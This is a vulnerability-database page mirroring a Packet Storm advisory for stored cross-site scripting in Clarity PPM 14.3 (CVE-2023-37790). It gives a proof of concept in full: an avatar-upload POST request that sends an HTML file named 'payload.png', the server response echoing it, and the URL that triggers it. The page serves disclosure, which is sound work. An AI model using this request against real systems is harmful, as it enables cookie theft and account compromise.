Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormKaizenPACKETSTORM:173508
HistoryJul 17, 2023 - 12:00 a.m.

Clarity PPM 14.3.0.298 Cross Site Scripting

2023-07-1700:00:00
Kaizen
packetstormsecurity.com
138
clarity ppm 14.3
cross site scripting
input validation
remote attackers
jaspersoft
cve-2023-37790
browser security
form data validation
stored xss

0.001 Low

EPSS

Percentile

27.1%

JSON
`==================================================================================================================================  
# Title : Insufficient input validation , in CA PPM 14.3 allows remote attackers to execute stored cross-site scripting attacks. |  
# Author : Kaizen |  
# Tested on : windows 10 / browser : Chrome Version 114.0.5735.133 (Official Build) (x86_64) |  
# Vendor : https://www.broadcom.com/   
# Dork : https://www.broadcom.com/products/software/value-stream-management/clarity |  
#Affected Product Version: Clarity PPM 14.3.0.298 / Jaspersoft  
#CVE Assigned: CVE-2023-37790  
==================================================================================================================================  
  
POC:  
  
Header: Content-Type: text/html; charset=utf-8  
  
Payload: <body onload=alert(document.cookie)>  
  
  
HTTP Request:  
POST /niku/nu?uitk.vxml.form=1&action=projmgr.avatarPhotoUpload&2097152&Error%20CMN-01035:%20The%20file%20size%20exceeds%202%20MB%20limit%20or%20file%20type%20is%20not%20supported.%20Please%20try%20again.&uitk.navigation.location=Modal&uitk.navigation.parent.location=Modal&uitk.navigation.last.workspace.action=npt.overview HTTP/1.1  
  
[REDACTED]  
  
------WebKitFormBoundaryr7Mas24AkgGJH4HE  
Content-Disposition: form-data; name="avatar_photo"  
  
------WebKitFormBoundaryr7Mas24AkgGJH4HE  
Content-Disposition: form-data; name="avatar_photo_ODF_New_Attachment_File_Name"; filename="payload.png"  
Content-Type: text/html; charset=utf-8  
  
<body onload=alert(document.cookie)>  
------WebKitFormBoundaryr7Mas24AkgGJH4HE  
Content-Disposition: form-data; name="superSecretTokenKey"  
  
superSecretTokenValue  
------WebKitFormBoundaryr7Mas24AkgGJH4HE--  
  
  
HTTP Response:  
  
HTTP/1.1 200 OK  
content-disposition: inline;filename="payload.png"  
Content-Type: text/html;charset=utf-8  
Content-Length: 90  
Date: Thu, 06 Jul 2023 07:33:24 GMT  
Connection: close  
Server: CA PPM  
  
<body onload=alert(document.cookie)>  
  
  
  
To Trigger Stored XSS visit user profile picture.  
  
https://127.0.0.1/niku/app?action=union.viewODFFile&objectType=resource&odf_pk=5763513&fileId=5178985&versionId=51[REDACTED]hXm0r7tSeUqEr=true  
`

Related

cve 1
cvelist 1
nvd 1
prion 1
cve
cve
CVE-2023-37790
2023-11-09 00:15:08
cvelist
cvelist
CVE-2023-37790
2023-11-08 00:00:00
nvd
nvd
CVE-2023-37790
2023-11-09 00:15:08
prion
prion
Design/Logic Flaw
2023-11-09 00:15:00

0.001 Low

EPSS

Percentile

27.1%

JSON
Related for PACKETSTORM:173508
cve1cvelist1nvd1prion1